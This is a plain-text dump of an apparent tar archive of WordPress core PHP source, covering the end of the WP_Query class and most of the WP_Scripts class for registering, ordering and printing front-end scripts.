global $id, $authordata, $currentday, $currentmonth, $page, $pages, $multipage, $more, $numpages;
if ( ! ( $post instanceof WP_Post ) ) {
$post = get_post( $post );
}
if ( ! $post ) {
return;
}
$elements = $this->generate_postdata( $post );
if ( false === $elements ) {
return;
}
$id = $elements['id'];
$authordata = $elements['authordata'];
$currentday = $elements['currentday'];
$currentmonth = $elements['currentmonth'];
$page = $elements['page'];
$pages = $elements['pages'];
$multipage = $elements['multipage'];
$more = $elements['more'];
$numpages = $elements['numpages'];
/**
* Fires once the post data has been set up.
*
* @since 2.8.0
* @since 4.1.0 Introduced `$query` parameter.
*
* @param WP_Post $post The Post object (passed by reference).
* @param WP_Query $query The current Query object (passed by reference).
*/
do_action_ref_array( 'the_post', array( &$post, &$this ) );
return true;
}
/**
* Generates post data.
*
* @since 5.2.0
*
* @param WP_Post|object|int $post WP_Post instance or Post ID/object.
* @return array|false Elements of post or false on failure.
*/
public function generate_postdata( $post ) {
if ( ! ( $post instanceof WP_Post ) ) {
$post = get_post( $post );
}
if ( ! $post ) {
return false;
}
$id = (int) $post->ID;
$authordata = get_userdata( $post->post_author );
$currentday = false;
$currentmonth = false;
$post_date = $post->post_date;
if ( ! empty( $post_date ) && '0000-00-00 00:00:00' !== $post_date ) {
// Avoid using mysql2date for performance reasons.
$currentmonth = substr( $post_date, 5, 2 );
$day = substr( $post_date, 8, 2 );
$year = substr( $post_date, 2, 2 );
$currentday = sprintf( '%s.%s.%s', $day, $currentmonth, $year );
}
$numpages = 1;
$multipage = 0;
$page = $this->get( 'page' );
if ( ! $page ) {
$page = 1;
}
/*
* Force full post content when viewing the permalink for the $post,
* or when on an RSS feed. Otherwise respect the 'more' tag.
*/
if ( get_queried_object_id() === $post->ID && ( $this->is_page() || $this->is_single() ) ) {
$more = 1;
} elseif ( $this->is_feed() ) {
$more = 1;
} else {
$more = 0;
}
$content = $post->post_content;
if ( str_contains( $content, '<!--nextpage-->' ) ) {
$content = str_replace( "\n<!--nextpage-->\n", '<!--nextpage-->', $content );
$content = str_replace( "\n<!--nextpage-->", '<!--nextpage-->', $content );
$content = str_replace( "<!--nextpage-->\n", '<!--nextpage-->', $content );
// Remove the nextpage block delimiters, to avoid invalid block structures in the split content.
$content = str_replace( '<!-- wp:nextpage -->', '', $content );
$content = str_replace( '<!-- /wp:nextpage -->', '', $content );
// Ignore nextpage at the beginning of the content.
if ( str_starts_with( $content, '<!--nextpage-->' ) ) {
$content = substr( $content, 15 );
}
$pages = explode( '<!--nextpage-->', $content );
} else {
$pages = array( $post->post_content );
}
/**
* Filters the "pages" derived from splitting the post content.
*
* "Pages" are determined by splitting the post content based on the presence
* of `<!-- nextpage -->` tags.
*
* @since 4.4.0
*
* @param string[] $pages Array of "pages" from the post content split by `<!-- nextpage -->` tags.
* @param WP_Post $post Current post object.
*/
$pages = apply_filters( 'content_pagination', $pages, $post );
$numpages = count( $pages );
if ( $numpages > 1 ) {
if ( $page > 1 ) {
$more = 1;
}
$multipage = 1;
} else {
$multipage = 0;
}
$elements = compact( 'id', 'authordata', 'currentday', 'currentmonth', 'page', 'pages', 'multipage', 'more', 'numpages' );
return $elements;
}
/**
* Generates cache key.
*
* @since 6.1.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $args Query arguments.
* @param string $sql SQL statement.
* @return string Cache key.
*/
protected function generate_cache_key( array $args, $sql ) {
global $wpdb;
unset(
$args['cache_results'],
$args['fields'],
$args['lazy_load_term_meta'],
$args['update_post_meta_cache'],
$args['update_post_term_cache'],
$args['update_menu_item_cache'],
$args['suppress_filters']
);
if ( empty( $args['post_type'] ) ) {
if ( $this->is_attachment ) {
$args['post_type'] = 'attachment';
} elseif ( $this->is_page ) {
$args['post_type'] = 'page';
} else {
$args['post_type'] = 'post';
}
} elseif ( 'any' === $args['post_type'] ) {
$args['post_type'] = array_values( get_post_types( array( 'exclude_from_search' => false ) ) );
}
$args['post_type'] = (array) $args['post_type'];
// Sort post types to ensure same cache key generation.
sort( $args['post_type'] );
/*
* Sort arrays that can be used for ordering prior to cache key generation.
*
* These arrays are sorted in the query generator for the purposes of the
* WHERE clause but the arguments are not modified as they can be used for
* the orderby clause.
*
* Their use in the orderby clause will generate a different SQL query so
* they can be sorted for the cache key generation.
*/
$sortable_arrays_with_int_values = array(
'post__in',
'post_parent__in',
);
foreach ( $sortable_arrays_with_int_values as $key ) {
if ( isset( $args[ $key ] ) && is_array( $args[ $key ] ) ) {
$args[ $key ] = array_unique( array_map( 'absint', $args[ $key ] ) );
sort( $args[ $key ] );
}
}
// Sort and unique the 'post_name__in' for cache key generation.
if ( isset( $args['post_name__in'] ) && is_array( $args['post_name__in'] ) ) {
$args['post_name__in'] = array_unique( $args['post_name__in'] );
sort( $args['post_name__in'] );
}
if ( isset( $args['post_status'] ) ) {
$args['post_status'] = (array) $args['post_status'];
// Sort post status to ensure same cache key generation.
sort( $args['post_status'] );
}
// Add a default orderby value of date to ensure same cache key generation.
if ( ! isset( $args['orderby'] ) ) {
$args['orderby'] = 'date';
}
$placeholder = $wpdb->placeholder_escape();
array_walk_recursive(
$args,
/*
* Replace wpdb placeholders with the string used in the database
* query to avoid unreachable cache keys. This is necessary because
* the placeholder is randomly generated in each request.
*
* $value is passed by reference to allow it to be modified.
* array_walk_recursive() does not return an array.
*/
static function ( &$value ) use ( $wpdb, $placeholder ) {
if ( is_string( $value ) && str_contains( $value, $placeholder ) ) {
$value = $wpdb->remove_placeholder_escape( $value );
}
}
);
ksort( $args );
// Replace wpdb placeholder in the SQL statement used by the cache key.
$sql = $wpdb->remove_placeholder_escape( $sql );
$key = md5( serialize( $args ) . $sql );
$this->query_cache_key = "wp_query:$key";
return $this->query_cache_key;
}
/**
* After looping through a nested query, this function
* restores the $post global to the current post in this query.
*
* @since 3.7.0
*
* @global WP_Post $post Global post object.
*/
public function reset_postdata() {
if ( ! empty( $this->post ) ) {
$GLOBALS['post'] = $this->post;
$this->setup_postdata( $this->post );
}
}
/**
* Lazyloads term meta for posts in the loop.
*
* @since 4.4.0
* @deprecated 4.5.0 See wp_queue_posts_for_term_meta_lazyload().
*
* @param mixed $check
* @param int $term_id
* @return mixed
*/
public function lazyload_term_meta( $check, $term_id ) {
_deprecated_function( __METHOD__, '4.5.0' );
return $check;
}
/**
* Lazyloads comment meta for comments in the loop.
*
* @since 4.4.0
* @deprecated 4.5.0 See wp_lazyload_comment_meta().
*
* @param mixed $check
* @param int $comment_id
* @return mixed
*/
public function lazyload_comment_meta( $check, $comment_id ) {
_deprecated_function( __METHOD__, '4.5.0' );
return $check;
}
}
class-wp-scripts-20260621093250.php 0000666 00000104060 15224151220 0012055 0 ustar 00 <?php
/**
* Dependencies API: WP_Scripts class
*
* @since 2.6.0
*
* @package WordPress
* @subpackage Dependencies
*/
/**
* Core class used to register scripts.
*
* @since 2.1.0
*
* @see WP_Dependencies
*/
class WP_Scripts extends WP_Dependencies {
/**
* Base URL for scripts.
*
* Full URL with trailing slash.
*
* @since 2.6.0
* @var string
*/
public $base_url;
/**
* URL of the content directory.
*
* @since 2.8.0
* @var string
*/
public $content_url;
/**
* Default version string for scripts.
*
* @since 2.6.0
* @var string
*/
public $default_version;
/**
* Holds handles of scripts which are enqueued in footer.
*
* @since 2.8.0
* @var array
*/
public $in_footer = array();
/**
* Holds a list of script handles which will be concatenated.
*
* @since 2.8.0
* @var string
*/
public $concat = '';
/**
* Holds a string which contains script handles and their version.
*
* @since 2.8.0
* @deprecated 3.4.0
* @var string
*/
public $concat_version = '';
/**
* Whether to perform concatenation.
*
* @since 2.8.0
* @var bool
*/
public $do_concat = false;
/**
* Holds HTML markup of scripts and additional data if concatenation
* is enabled.
*
* @since 2.8.0
* @var string
*/
public $print_html = '';
/**
* Holds inline code if concatenation is enabled.
*
* @since 2.8.0
* @var string
*/
public $print_code = '';
/**
* Holds a list of script handles which are not in the default directory
* if concatenation is enabled.
*
* Unused in core.
*
* @since 2.8.0
* @var string
*/
public $ext_handles = '';
/**
* Holds a string which contains handles and versions of scripts which
* are not in the default directory if concatenation is enabled.
*
* Unused in core.
*
* @since 2.8.0
* @var string
*/
public $ext_version = '';
/**
* List of default directories.
*
* @since 2.8.0
* @var array
*/
public $default_dirs;
/**
* Holds a mapping of dependents (as handles) for a given script handle.
* Used to optimize recursive dependency tree checks.
*
* @since 6.3.0
* @var array<string, string[]>
*/
private $dependents_map = array();
/**
* Holds a reference to the delayed (non-blocking) script loading strategies.
* Used by methods that validate loading strategies.
*
* @since 6.3.0
* @var string[]
*/
private $delayed_strategies = array( 'defer', 'async' );
/**
* Constructor.
*
* @since 2.6.0
*/
public function __construct() {
$this->init();
add_action( 'init', array( $this, 'init' ), 0 );
}
/**
* Initialize the class.
*
* @since 3.4.0
*/
public function init() {
/**
* Fires when the WP_Scripts instance is initialized.
*
* @since 2.6.0
*
* @param WP_Scripts $wp_scripts WP_Scripts instance (passed by reference).
*/
do_action_ref_array( 'wp_default_scripts', array( &$this ) );
}
/**
* Prints scripts.
*
* Prints the scripts passed to it or the print queue. Also prints all necessary dependencies.
*
* @since 2.1.0
* @since 2.8.0 Added the `$group` parameter.
*
* @param string|string[]|false $handles Optional. Scripts to be printed: queue (false),
* single script (string), or multiple scripts (array of strings).
* Default false.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return string[] Handles of scripts that have been printed.
*/
public function print_scripts( $handles = false, $group = false ) {
return $this->do_items( $handles, $group );
}
/**
* Prints extra scripts of a registered script.
*
* @since 2.1.0
* @since 2.8.0 Added the `$display` parameter.
* @deprecated 3.3.0
*
* @see print_extra_script()
*
* @param string $handle The script's registered handle.
* @param bool $display Optional. Whether to print the extra script
* instead of just returning it. Default true.
* @return bool|string|void Void if no data exists, extra scripts if `$display` is true,
* true otherwise.
*/
public function print_scripts_l10n( $handle, $display = true ) {
_deprecated_function( __FUNCTION__, '3.3.0', 'WP_Scripts::print_extra_script()' );
return $this->print_extra_script( $handle, $display );
}
/**
* Prints extra scripts of a registered script.
*
* @since 3.3.0
*
* @param string $handle The script's registered handle.
* @param bool $display Optional. Whether to print the extra script
* instead of just returning it. Default true.
* @return bool|string|void Void if no data exists, extra scripts if `$display` is true,
* true otherwise.
*/
public function print_extra_script( $handle, $display = true ) {
$output = $this->get_data( $handle, 'data' );
if ( ! $output ) {
return;
}
/*
* Do not print a sourceURL comment if concatenation is enabled.
*
* Extra scripts may be concatenated into a single script.
* The line-based sourceURL comments may break concatenated scripts
* and do not make sense when multiple scripts are joined together.
*/
if ( ! $this->do_concat ) {
$output .= sprintf(
"\n//# sourceURL=%s",
rawurlencode( "{$handle}-js-extra" )
);
}
if ( ! $display ) {
return $output;
}
wp_print_inline_script_tag( $output, array( 'id' => "{$handle}-js-extra" ) );
return true;
}
/**
* Checks whether all dependents of a given handle are in the footer.
*
* If there are no dependents, this is considered the same as if all dependents were in the footer.
*
* @since 6.4.0
*
* @param string $handle Script handle.
* @return bool Whether all dependents are in the footer.
*/
private function are_all_dependents_in_footer( $handle ) {
foreach ( $this->get_dependents( $handle ) as $dep ) {
if ( isset( $this->groups[ $dep ] ) && 0 === $this->groups[ $dep ] ) {
return false;
}
}
return true;
}
/**
* Processes a script dependency.
*
* @since 2.6.0
* @since 2.8.0 Added the `$group` parameter.
*
* @see WP_Dependencies::do_item()
*
* @param string $handle The script's registered handle.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return bool True on success, false on failure.
*/
public function do_item( $handle, $group = false ) {
if ( ! parent::do_item( $handle ) ) {
return false;
}
if ( 0 === $group && $this->groups[ $handle ] > 0 ) {
$this->in_footer[] = $handle;
return false;
}
if ( false === $group && in_array( $handle, $this->in_footer, true ) ) {
$this->in_footer = array_diff( $this->in_footer, (array) $handle );
}
$obj = $this->registered[ $handle ];
if ( $obj->extra['conditional'] ?? false ) {
return false;
}
if ( null === $obj->ver ) {
$ver = '';
} else {
$ver = $obj->ver ? $obj->ver : $this->default_version;
}
if ( isset( $this->args[ $handle ] ) ) {
$ver = $ver ? $ver . '&' . $this->args[ $handle ] : $this->args[ $handle ];
}
$src = $obj->src;
$strategy = $this->get_eligible_loading_strategy( $handle );
$intended_strategy = (string) $this->get_data( $handle, 'strategy' );
if ( ! $this->is_delayed_strategy( $intended_strategy ) ) {
$intended_strategy = '';
}
/*
* Move this script to the footer if:
* 1. The script is in the header group.
* 2. The current output is the header.
* 3. The intended strategy is delayed.
* 4. The actual strategy is not delayed.
* 5. All dependent scripts are in the footer.
*/
if (
0 === $group &&
0 === $this->groups[ $handle ] &&
$intended_strategy &&
! $this->is_delayed_strategy( $strategy ) &&
$this->are_all_dependents_in_footer( $handle )
) {
$this->in_footer[] = $handle;
return false;
}
$before_script = $this->get_inline_script_tag( $handle, 'before' );
$after_script = $this->get_inline_script_tag( $handle, 'after' );
if ( $before_script || $after_script ) {
$inline_script_tag = $before_script . $after_script;
} else {
$inline_script_tag = '';
}
/*
* Prevent concatenation of scripts if the text domain is defined
* to ensure the dependency order is respected.
*/
$translations_stop_concat = ! empty( $obj->textdomain );
$translations = $this->print_translations( $handle, false );
if ( $translations ) {
/*
* The sourceURL comment is not included by WP_Scripts::print_translations()
* when `$display` is `false` to prevent issues where the script tag contents are used
* by extenders for other purposes, for example concatenated with other script content.
*
* Include the sourceURL comment here as it would be when printed directly.
*/
$source_url = rawurlencode( "{$handle}-js-translations" );
$translations .= "\n//# sourceURL={$source_url}";
$translations = wp_get_inline_script_tag( $translations, array( 'id' => "{$handle}-js-translations" ) );
}
if ( $this->do_concat ) {
/**
* Filters the script loader source.
*
* @since 2.2.0
*
* @param string $src Script loader source path.
* @param string $handle Script handle.
*/
$filtered_src = apply_filters( 'script_loader_src', $src, $handle );
if (
$this->in_default_dir( $filtered_src )
&& ( $before_script || $after_script || $translations_stop_concat || $this->is_delayed_strategy( $strategy ) )
) {
$this->do_concat = false;
// Have to print the so-far concatenated scripts right away to maintain the right order.
_print_scripts();
$this->reset();
} elseif ( $this->in_default_dir( $filtered_src ) ) {
$this->print_code .= $this->print_extra_script( $handle, false );
$this->concat .= "$handle,";
$this->concat_version .= "$handle$ver";
return true;
} else {
$this->ext_handles .= "$handle,";
$this->ext_version .= "$handle$ver";
}
}
$this->print_extra_script( $handle );
// A single item may alias a set of items, by having dependencies, but no source.
if ( ! $src ) {
if ( $inline_script_tag ) {
if ( $this->do_concat ) {
$this->print_html .= $inline_script_tag;
} else {
echo $inline_script_tag;
}
}
return true;
}
if ( ! preg_match( '|^(https?:)?//|', $src ) && ! ( $this->content_url && str_starts_with( $src, $this->content_url ) ) ) {
$src = $this->base_url . $src;
}
if ( ! empty( $ver ) ) {
$src = add_query_arg( 'ver', $ver, $src );
}
/** This filter is documented in wp-includes/class-wp-scripts.php */
$src = esc_url_raw( apply_filters( 'script_loader_src', $src, $handle ) );
if ( ! $src ) {
return true;
}
$attr = array(
'src' => $src,
'id' => "{$handle}-js",
);
if ( $strategy ) {
$attr[ $strategy ] = true;
}
if ( $intended_strategy ) {
$attr['data-wp-strategy'] = $intended_strategy;
}
// Determine fetchpriority.
$original_fetchpriority = isset( $obj->extra['fetchpriority'] ) ? $obj->extra['fetchpriority'] : null;
if ( null === $original_fetchpriority || ! $this->is_valid_fetchpriority( $original_fetchpriority ) ) {
$original_fetchpriority = 'auto';
}
$actual_fetchpriority = $this->get_highest_fetchpriority_with_dependents( $handle );
if ( null === $actual_fetchpriority ) {
// If null, it's likely this script was not explicitly enqueued, so in this case use the original priority.
$actual_fetchpriority = $original_fetchpriority;
}
if ( is_string( $actual_fetchpriority ) && 'auto' !== $actual_fetchpriority ) {
$attr['fetchpriority'] = $actual_fetchpriority;
}
if ( $original_fetchpriority !== $actual_fetchpriority ) {
$attr['data-wp-fetchpriority'] = $original_fetchpriority;
}
$tag = $translations . $before_script;
$tag .= wp_get_script_tag( $attr );
$tag .= $after_script;
/**
* Filters the HTML script tag of an enqueued script.
*
* @since 4.1.0
*
* @param string $tag The `<script>` tag for the enqueued script.
* @param string $handle The script's registered handle.
* @param string $src The script's source URL.
*/
$tag = apply_filters( 'script_loader_tag', $tag, $handle, $src );
if ( $this->do_concat ) {
$this->print_html .= $tag;
} else {
echo $tag;
}
return true;
}
/**
* Adds extra code to a registered script.
*
* @since 4.5.0
*
* @param string $handle Name of the script to add the inline script to.
* Must be lowercase.
* @param string $data String containing the JavaScript to be added.
* @param string $position Optional. Whether to add the inline script
* before the handle or after. Default 'after'.
* @return bool True on success, false on failure.
*/
public function add_inline_script( $handle, $data, $position = 'after' ) {
if ( ! $data ) {
return false;
}
if ( 'after' !== $position ) {
$position = 'before';
}
$script = (array) $this->get_data( $handle, $position );
$script[] = $data;
return $this->add_data( $handle, $position, $script );
}
/**
* Prints inline scripts registered for a specific handle.
*
* @since 4.5.0
* @deprecated 6.3.0 Use methods get_inline_script_tag() or get_inline_script_data() instead.
*
* @param string $handle Name of the script to print inline scripts for.
* Must be lowercase.
* @param string $position Optional. Whether to add the inline script
* before the handle or after. Default 'after'.
* @param bool $display Optional. Whether to print the script tag
* instead of just returning the script data. Default true.
* @return string|false Script data on success, false otherwise.
*/
public function print_inline_script( $handle, $position = 'after', $display = true ) {
_deprecated_function( __METHOD__, '6.3.0', 'WP_Scripts::get_inline_script_data() or WP_Scripts::get_inline_script_tag()' );
$output = $this->get_inline_script_data( $handle, $position );
if ( empty( $output ) ) {
return false;
}
if ( $display ) {
echo $this->get_inline_script_tag( $handle, $position );
}
return $output;
}
/**
* Gets data for inline scripts registered for a specific handle.
*
* @since 6.3.0
*
* @param string $handle Name of the script to get data for.
* Must be lowercase.
* @param string $position Optional. Whether to add the inline script
* before the handle or after. Default 'after'.
* @return string Inline script, which may be empty string.
*/
public function get_inline_script_data( $handle, $position = 'after' ) {
$data = $this->get_data( $handle, $position );
if ( empty( $data ) || ! is_array( $data ) ) {
return '';
}
/*
* Print sourceURL comment regardless of concatenation.
*
* Inline scripts prevent scripts from being concatenated, so
* sourceURL comments are safe to print for inline scripts.
*/
$data[] = sprintf(
'//# sourceURL=%s',
rawurlencode( "{$handle}-js-{$position}" )
);
return trim( implode( "\n", $data ), "\n" );
}
/**
* Gets tags for inline scripts registered for a specific handle.
*
* @since 6.3.0
*
* @param string $handle Name of the script to get associated inline script tag for.
* Must be lowercase.
* @param string $position Optional. Whether to get tag for inline
* scripts in the before or after position. Default 'after'.
* @return string Inline script, which may be empty string.
*/
public function get_inline_script_tag( $handle, $position = 'after' ) {
$js = $this->get_inline_script_data( $handle, $position );
if ( empty( $js ) ) {
return '';
}
$id = "{$handle}-js-{$position}";
return wp_get_inline_script_tag( $js, compact( 'id' ) );
}
/**
* Localizes a script, only if the script has already been added.
*
* @since 2.1.0
*
* @param string $handle Name of the script to attach data to.
* @param string $object_name Name of the variable that will contain the data.
* @param array $l10n Array of data to localize.
* @return bool True on success, false on failure.
*/
public function localize( $handle, $object_name, $l10n ) {
if ( 'jquery' === $handle ) {
$handle = 'jquery-core';
}
if ( is_array( $l10n ) && isset( $l10n['l10n_print_after'] ) ) { // back compat, preserve the code in 'l10n_print_after' if present.
$after = $l10n['l10n_print_after'];
unset( $l10n['l10n_print_after'] );
}
if ( ! is_array( $l10n ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $l10n, 2: wp_add_inline_script() */
__( 'The %1$s parameter must be an array. To pass arbitrary data to scripts, use the %2$s function instead.' ),
'<code>$l10n</code>',
'<code>wp_add_inline_script()</code>'
),
'5.7.0'
);
if ( false === $l10n ) {
// This should really not be needed, but is necessary for backward compatibility.
$l10n = array( $l10n );
}
}
if ( is_string( $l10n ) ) {
$l10n = html_entity_decode( $l10n, ENT_QUOTES, 'UTF-8' );
} elseif ( is_array( $l10n ) ) {
foreach ( $l10n as $key => $value ) {
if ( ! is_scalar( $value ) ) {
continue;
}
$l10n[ $key ] = html_entity_decode( (string) $value, ENT_QUOTES, 'UTF-8' );
}
}
$script = "var $object_name = " . wp_json_encode( $l10n, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) . ';';
if ( ! empty( $after ) ) {
$script .= "\n$after;";
}
$data = $this->get_data( $handle, 'data' );
if ( ! empty( $data ) ) {
$script = "$data\n$script";
}
return $this->add_data( $handle, 'data', $script );
}
/**
* Sets handle group.
*
* @since 2.8.0
*
* @see WP_Dependencies::set_group()
*
* @param string $handle Name of the item. Should be unique.
* @param bool $recursion Internal flag that calling function was called recursively.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return bool Not already in the group or a lower group.
*/
public function set_group( $handle, $recursion, $group = false ) {
if ( isset( $this->registered[ $handle ]->args ) && 1 === $this->registered[ $handle ]->args ) {
$calculated_group = 1;
} else {
$calculated_group = (int) $this->get_data( $handle, 'group' );
}
if ( false !== $group && $calculated_group > $group ) {
$calculated_group = $group;
}
return parent::set_group( $handle, $recursion, $calculated_group );
}
/**
* Sets a translation textdomain.
*
* @since 5.0.0
* @since 5.1.0 The `$domain` parameter was made optional.
*
* @param string $handle Name of the script to register a translation domain to.
* @param string $domain Optional. Text domain. Default 'default'.
* @param string $path Optional. The full file path to the directory containing translation files.
* @return bool True if the text domain was registered, false if not.
*/
public function set_translations( $handle, $domain = 'default', $path = '' ) {
if ( ! isset( $this->registered[ $handle ] ) ) {
return false;
}
/** @var \_WP_Dependency $obj */
$obj = $this->registered[ $handle ];
if ( ! in_array( 'wp-i18n', $obj->deps, true ) ) {
$obj->deps[] = 'wp-i18n';
}
return $obj->set_translations( $domain, $path );
}
/**
* Prints translations set for a specific handle.
*
* @since 5.0.0
*
* @param string $handle Name of the script to add the inline script to.
* Must be lowercase.
* @param bool $display Optional. Whether to print the script
* instead of just returning it. Default true.
* @return string|false Script on success, false otherwise.
*/
public function print_translations( $handle, $display = true ) {
if ( ! isset( $this->registered[ $handle ] ) || empty( $this->registered[ $handle ]->textdomain ) ) {
return false;
}
$domain = $this->registered[ $handle ]->textdomain;
$path = '';
if ( isset( $this->registered[ $handle ]->translations_path ) ) {
$path = $this->registered[ $handle ]->translations_path;
}
$json_translations = load_script_textdomain( $handle, $domain, $path );
if ( ! $json_translations ) {
return false;
}
$output = <<<JS
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
} )( "{$domain}", {$json_translations} );
JS;
if ( $display ) {
$source_url = rawurlencode( "{$handle}-js-translations" );
$output .= "\n//# sourceURL={$source_url}";
wp_print_inline_script_tag( $output, array( 'id' => "{$handle}-js-translations" ) );
}
return $output;
}
/**
* Determines script dependencies.
*
* @since 2.1.0
*
* @see WP_Dependencies::all_deps()
*
* @param string|string[] $handles Item handle (string) or item handles (array of strings).
* @param bool $recursion Optional. Internal flag that function is calling itself.
* Default false.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return bool True on success, false on failure.
*/
public function all_deps( $handles, $recursion = false, $group = false ) {
$result = parent::all_deps( $handles, $recursion, $group );
if ( ! $recursion ) {
/**
* Filters the list of script dependencies left to print.
*
* @since 2.3.0
*
* @param string[] $to_do An array of script dependency handles.
*/
$this->to_do = apply_filters( 'print_scripts_array', $this->to_do );
}
return $result;
}
/**
* Processes items and dependencies for the head group.
*
* @since 2.8.0
*
* @see WP_Dependencies::do_items()
*
* @return string[] Handles of items that have been processed.
*/
public function do_head_items() {
$this->do_items( false, 0 );
return $this->done;
}
/**
* Processes items and dependencies for the footer group.
*
* @since 2.8.0
*
* @see WP_Dependencies::do_items()
*
* @return string[] Handles of items that have been processed.
*/
public function do_footer_items() {
$this->do_items( false, 1 );
return $this->done;
}
/**
* Whether a handle's source is in a default directory.
*
* @since 2.8.0
*
* @param string $src The source of the enqueued script.
* @return bool True if found, false if not.
*/
public function in_default_dir( $src ) {
if ( ! $this->default_dirs ) {
return true;
}
if ( str_starts_with( $src, '/' . WPINC . '/js/l10n' ) ) {
return false;
}
foreach ( (array) $this->default_dirs as $test ) {
if ( str_starts_with( $src, $test ) ) {
return true;
}
}
return false;
}
/**
* This overrides the add_data method from WP_Dependencies, to support normalizing of $args.
*
* @since 6.3.0
*
* @param string $handle Name of the item. Should be unique.
* @param string $key The data key.
* @param mixed $value The data value.
* @return bool True on success, false on failure.
*/
public function add_data( $handle, $key, $value ) {
if ( ! isset( $this->registered[ $handle ] ) ) {
return false;
}
if ( 'conditional' === $key ) {
// If a dependency is declared by a conditional script, remove it.
$this->registered[ $handle ]->deps = array();
}
if ( 'strategy' === $key ) {
if ( ! empty( $value ) && ! $this->is_delayed_strategy( $value ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $strategy, 2: $handle */
__( 'Invalid strategy `%1$s` defined for `%2$s` during script registration.' ),
$value,
$handle
),
'6.3.0'
);
return false;
} elseif ( ! $this->registered[ $handle ]->src && $this->is_delayed_strategy( $value ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $strategy, 2: $handle */
__( 'Cannot supply a strategy `%1$s` for script `%2$s` because it is an alias (it lacks a `src` value).' ),
$value,
$handle
),
'6.3.0'
);
return false;
}
} elseif ( 'fetchpriority' === $key ) {
if ( empty( $value ) ) {
$value = 'auto';
}
if ( ! $this->is_valid_fetchpriority( $value ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $fetchpriority, 2: $handle */
__( 'Invalid fetchpriority `%1$s` defined for `%2$s` during script registration.' ),
is_string( $value ) ? $value : gettype( $value ),
$handle
),
'6.9.0'
);
return false;
} elseif ( ! $this->registered[ $handle ]->src ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $fetchpriority, 2: $handle */
__( 'Cannot supply a fetchpriority `%1$s` for script `%2$s` because it is an alias (it lacks a `src` value).' ),
is_string( $value ) ? $value : gettype( $value ),
$handle
),
'6.9.0'
);
return false;
}
}
return parent::add_data( $handle, $key, $value );
}
/**
* Gets all dependents of a script.
*
* This is not recursive.
*
* @since 6.3.0
*
* @param string $handle The script handle.
* @return string[] Script handles.
*/
private function get_dependents( $handle ) {
// Check if dependents map for the handle in question is present. If so, use it.
if ( isset( $this->dependents_map[ $handle ] ) ) {
return $this->dependents_map[ $handle ];
}
$dependents = array();
// Iterate over all registered scripts, finding dependents of the script passed to this method.
foreach ( $this->registered as $registered_handle => $args ) {
if ( in_array( $handle, $args->deps, true ) ) {
$dependents[] = $registered_handle;
}
}
// Add the handles dependents to the map to ease future lookups.
$this->dependents_map[ $handle ] = $dependents;
return $dependents;
}
/**
* Checks if the strategy passed is a valid delayed (non-blocking) strategy.
*
* @since 6.3.0
*
* @param string|mixed $strategy The strategy to check.
* @return bool True if $strategy is one of the delayed strategies, otherwise false.
*/
private function is_delayed_strategy( $strategy ): bool {
return in_array(
$strategy,
$this->delayed_strategies,
true
);
}
/**
* Checks if the provided fetchpriority is valid.
*
* @since 6.9.0
*
* @param string|mixed $priority Fetch priority.
* @return bool Whether valid fetchpriority.
*/
private function is_valid_fetchpriority( $priority ): bool {
return in_array( $priority, array( 'auto', 'low', 'high' ), true );
}
/**
* Gets the best eligible loading strategy for a script.
*
* @since 6.3.0
*
* @param string $handle The script handle.
* @return string The best eligible loading strategy.
*/
private function get_eligible_loading_strategy( $handle ) {
$intended_strategy = (string) $this->get_data( $handle, 'strategy' );
// Bail early if there is no intended strategy.
if ( ! $intended_strategy ) {
return '';
}
/*
* If the intended strategy is 'defer', limit the initial list of eligible
* strategies, since 'async' can fallback to 'defer', but not vice-versa.
*/
$initial_strategy = ( 'defer' === $intended_strategy ) ? array( 'defer' ) : null;
$eligible_strategies = $this->filter_eligible_strategies( $handle, $initial_strategy );
// Return early once we know the eligible strategy is blocking.
if ( empty( $eligible_strategies ) ) {
return '';
}
return in_array( 'async', $eligible_strategies, true ) ? 'async' : 'defer';
}
/**
* Filter the list of eligible loading strategies for a script.
*
* @since 6.3.0
*
* @param string $handle The script handle.
* @param string[]|null $eligible_strategies Optional. The list of strategies to filter. Default null.
* @param array<string, true> $checked Optional. An array of already checked script handles, used to avoid recursive loops.
* @param array<string, string[]> $stored_results Optional. An array of already computed eligible loading strategies by handle, used to increase performance in large dependency lists.
* @return string[] A list of eligible loading strategies that could be used.
*/
private function filter_eligible_strategies( $handle, $eligible_strategies = null, $checked = array(), array &$stored_results = array() ) {
if ( isset( $stored_results[ $handle ] ) ) {
return $stored_results[ $handle ];
}
// If no strategies are being passed, all strategies are eligible.
if ( null === $eligible_strategies ) {
$eligible_strategies = $this->delayed_strategies;
}
// If this handle was already checked, return early.
if ( isset( $checked[ $handle ] ) ) {
return $eligible_strategies;
}
// Mark this handle as checked.
$checked[ $handle ] = true;
// If this handle isn't registered, don't filter anything and return.
if ( ! isset( $this->registered[ $handle ] ) ) {
return $eligible_strategies;
}
// If the handle is not enqueued, don't filter anything and return.
if ( ! $this->query( $handle, 'enqueued' ) ) {
return $eligible_strategies;
}
$is_alias = (bool) ! $this->registered[ $handle ]->src;
$intended_strategy = $this->get_data( $handle, 'strategy' );
// For non-alias handles, an empty intended strategy filters all strategies.
if ( ! $is_alias && empty( $intended_strategy ) ) {
return array();
}
// Handles with inline scripts attached in the 'after' position cannot be delayed.
if ( $this->has_inline_script( $handle, 'after' ) ) {
return array();
}
// If the intended strategy is 'defer', filter out 'async'.
if ( 'defer' === $intended_strategy ) {
$eligible_strategies = array( 'defer' );
}
$dependents = $this->get_dependents( $handle );
// Recursively filter eligible strategies for dependents.
foreach ( $dependents as $dependent ) {
// Bail early once we know the eligible strategy is blocking.
if ( empty( $eligible_strategies ) ) {
return array();
}
$eligible_strategies = $this->filter_eligible_strategies( $dependent, $eligible_strategies, $checked, $stored_results );
}
